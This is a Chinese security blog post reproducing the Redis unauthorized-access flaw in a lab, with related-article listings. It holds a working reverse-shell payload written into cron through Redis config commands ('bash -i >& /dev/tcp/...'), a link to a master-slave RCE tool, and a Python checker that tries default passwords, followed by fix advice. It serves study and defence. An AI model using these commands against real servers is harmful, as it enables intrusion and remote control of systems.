Redis未授权访问漏洞复现

最新推荐文章于 2025-07-10 14:56:10 发布
最新推荐文章于 2025-07-10 14:56:10 发布
阅读量540 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/baidu_38844729/article/details/106250601
本文详细分析了Redis在公网暴露且使用默认空密码时的安全漏洞,包括敏感信息泄露、后门文件植入及SSH公钥注入等风险。通过实操演示,如无账号直接登录、计划任务反弹shell和主从复制RCE,展示了攻击者如何利用这些漏洞。同时,提供了漏洞修复建议,如限制IP访问和添加密码认证。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

漏洞分析

漏洞产生:

  1. redis绑定在 0.0.0.0:6379,直接暴露在公网
  2. 默认为空密码,可以免密码远程登录redis服务

漏洞危害:

  1. 攻击者无需认证访问到内部数据,导致敏感信息泄露
  2. 攻击者通过数据备份功能往磁盘写入后门文件
  3. 如果redis以root身份运行,攻击者可以给root账户写入SSH公钥文件,直接通过SSH登录受害服务器

漏洞复现

环境:ubuntu系统两台,分别做为服务端和客户端
redis安装:

wget http://download.redis.io/releases/redis-2.8.17.tar.gz 下载安装包
tar xzvf redis-2.8.17.tar.gz		解压
cd redis-2.8.17						进入redis目录		
make								编译安装
cd src								进入src目录
cp redis-server /usr/bin			复制服务端
cp redis-cli /usr/bin				复制客户端
cp redis-2.8.17/redis.conf /etc/	复制conf配置文件

启动redis服务:redis-server /etc/redis.conf
在这里插入图片描述
漏洞测试:
1、客户端无账号直接登录redis
在这里插入图片描述
2、crontab-计划任务反弹shell
攻击机开启监听:nc -lvp 7777
连接redis执行命令:

redis-cli -h 10.18.100.38
config get dir			先查看备份目录,待会要修改回来,否则redis可能会出现异常
config get dbfilename 	先查看备份文件名

set  xx   "\n* * * * * bash -i >& /dev/tcp/攻击机IP/7777 0>&1\n"
config set dir /var/spool/cron	修改备份目录
config set dbfilename root		修改备份文件名
save
等待反弹shell,之后要改回原来的路径和文件名

config set dir xxxx
config set dbfilename dump.rdb
save

3、主从复制RCE
利用脚本:https://github.com/n0b0dyCN/redis-rogue-server

检测脚本

# _*_  coding:utf-8 _*_
import socket
import sys
PASSWORD_DIC=['redis','root','oracle','password','p@aaw0rd','abc123!','123456','admin']
def check(ip, port, timeout):
    try:
        socket.setdefaulttimeout(timeout)
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((ip, int(port)))
        s.send("INFO\r\n")
        result = s.recv(1024)
        if "redis_version" in result:
            return u"未授权访问"
        elif "Authentication" in result:
            for pass_ in PASSWORD_DIC:
                s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                s.connect((ip, int(port)))
                s.send("AUTH %s\r\n" %(pass_))
                result = s.recv(1024)
                if '+OK' in result:
                    return u"存在弱口令,密码:%s" % (pass_)
    except Exception, e:
        pass
if __name__ == '__main__':
    ip=sys.argv[1]
    port=sys.argv[2]
    print check(ip,port, timeout=10)

漏洞修复

1、限制IP访问
在redis.conf文件中找到# bind 127.0.0.1
在这里插入图片描述
去掉#bind 127.0.0.1前面的注释#,将127.0.0.1改成可以访问的IP地址
2、添加密码认证
redis.conf文件中找到requirepass,然后修改如下:

requirepass yourpassword
yourpassword就是redis验证密码,设置密码以后可以登陆,但是无法执行命令

客户端登录之后需要进行认证才能访问auth yourpassword
在这里插入图片描述

参考文章

https://www.cnblogs.com/bmjoker/p/9548962.html

Redis未授权漏洞复现
The current road is different, love needs to distinguish between right and wrong
11-29 1421
简介 Redis 默认情况下,会绑定在本地6379端口,如果没有进行相关策略,会将 Redis 服务暴露到公网上,在没有设置密码认证(默认为空)的情况下,任意用户在可以访问目标服务器的情况下未授权访问Redis 以及读取 Redis 的数据。攻击者在未授权访问 Redis 的情况下,利用 Redis 自身的提供的config 命令,可以进行写文件操作,可以将ssh公钥写入目标服务器的 /root/.ssh/authotrized_keys 文件中,进而可以使用对应私钥直接使用ssh服务登录...
redis未授权访问漏洞复现
findou
04-09 540
Redis是一个开源的key-value内存中的数据结构存储系统,可以用作缓存,或数据库,redis因为配置不当可以导致未授权访问redis的默认端口是6379,并且redis默认配置没有密码认证,如果reids服务暴露在公网上会导致攻击者在未授权的情况下访问redis。如果redis以root身份运行,攻击者可以给root账号写入ssh公钥文件,通过ssh登录目标主机。下面是redis未授权访...
redis未授权访问漏洞复现
qq_46343633的博客
01-19 3087
Redis 全称 Remote DictionaryServer(即远程字典服务),它是一个基于内存(当然也可以把其存储至硬盘上,这也是写shell的必要条件之一)实现的键值型非关系(NoSQL)数据库。Redis 免费开源,其最新稳定版本是 6.2.x(2022/11/10)。常用版本包括3.0、4.0、5.0。自 Redis 诞生以来,它以其超高的性能、完美的文档和简洁易懂的源码广受好评,国内外很多大型互联网公司都在使用 Redis,比如腾讯、阿里、Twitter、Github 等等。
网安系列【14】之Redis未授权访问漏洞
最新发布
缘友一世的博客
07-10 934
网安系列【14】之Redis未授权访问漏洞
漏洞复现Redis未授权访问
m0_56190544的博客
09-13 2976
本文详细介绍了redis未授权访问漏洞的原理以及利用方法,供大家参考学习
Redis未授权访问漏洞搭建复现
m0_58595840的博客
01-05 2977
Redis未授权访问漏洞利用方式总结(含靶场搭建)
Redis未授权访问漏洞复现与利用
Forget_liu的博客
06-07 3056
Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。
Redis未授权访问漏洞复现及利用
Lilin's博客
03-20 1146
Redis未授权访问漏洞复现及利用Redis相关介绍应用场景常用语法漏洞复现环境搭建Centos 7 环境配置安装Apache安装PHP安装Redis漏洞利用准备kali安装Rediswindows安装Redis未授权访问漏洞利用webshell反弹shell写公钥主从复制RCE预防措施其他问题 Redis相关介绍 Redis是完全开源的,遵守BSD协议,是一个高性能的key-value数据库。 应用场景 在Java web中主要有两个应用场景: 存储、缓存用的数据 需要高速读写的场合使用它快速读写 常
Redis未授权访问漏洞简单复现
m0_48867141的博客
03-22 3991
1.Redis简介 Redis是一个开源的,可持久化的日志型,Key-Value数据库。 2.漏洞简介 Redis默认情况下,会绑定在0.0.0.0:6379(在redis3.2之后,redis增加了protected-mode,在这个模式下,非绑定IP或者没有配置密码访问时都会报错),如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源ip访问等等,这样将会将Redis服务暴露在公网上,如果在没有设置密码认证(默认为空)的情况下,会导致任意用户在可以访问目标服务器的情况下未授权访...
Redis未授权访问漏洞
周星星的博客
08-22 1697
Redis未授权访问漏洞复现以及利用
redis未授权访问漏洞
weixin_42140534的博客
01-18 1061
0X01 漏洞介绍 redis 默认情况下,会绑定再 0.0.0.0:6379, 如果没有进行采用相关的策略,如添加防火墙规则避免其他非信任来源的ip访问,这样会将redis的服务暴漏在公网上,如果在没有设置密码认证的情况下,会导致任意用户可以访问目标服务器的情况下未授权访问redis以及读取redis数据。攻击者在未授权访问redis的情况下,利用redis自身提供的config命令,可以进行写文件的操作,攻击者可以成功将自己的ssh公钥写入目标服务器的/root/.ssh文件夹的authotrized_
Redis 未授权访问漏洞
MZLI_L的博客
11-08 3716
文章目录Redis未授权访问漏洞利用写文件上传文件写计划任务(没有成功)额外遇到的问题Bind多个IP失败 Redis未授权访问漏洞 简介 利用redis配置不当,或弱密码(反正就是能拿到redis的权限),然后利用redis做一系列操作。 利用 写文件 知识点 命令:CONFIG GET dir 获取数据库的存储路径(文件将会保存的地方,当然可以使用SET进行设置,如果有权限的话) 命令:CONFIG GET dbfilename 获取数据库文件名,默认是dump.rdb(通过SET设置为webshell
redis非授权访问漏洞
weixin_43995159的博客
11-29 1358
复现了三种redis未授权登录的场景。 1.通过redis写入计划任务,取得反弹shell。 2.通过redis写入一句话木马,取得shell。 3.通过redis写入ssh公钥,实现ssh无密码连接。
未授权访问Redis未授权访问漏洞
qq_68163788的博客
05-08 1439
未经授权访问是指在Redis数据库中,未经过身份验证或授权的情况下访问数据库的行为。Redis是一种流行的开源内存数据库,用于存储数据并提供快速访问。如果Redis实例未经过适当的安全配置,攻击者可以利用这一漏洞访问敏感数据,修改数据或甚至破坏数据库。未经授权访问可能导致数据泄露、数据损坏和系统崩溃等严重后果。为了防止未经授权访问,管理员应该采取必要的安全措施,例如设置访问控制列表、使用密码进行身份验证和定期更新Redis的安全配置。通过加强安全措施,可以有效防止未经授权访问Redis数据库造成的风险。
漏洞复现-Redis 未授权访问漏洞
Fisher
06-03 4545
作为菜鸡的我打完网鼎了解到了redis,于是复现一波redis漏洞,之后再去做一下网鼎ssrfme。 攻击者:kali 172.168.229.130 靶机: ubuntu20 172.168.229.132 前置知识: Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、 Key-Value数据库。(ps理解为就是一个数据库) 本漏洞有多条思路: 1.直接用exp getshell 2.在crontab里写定时任务,反弹shell 3. ssh key 直
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值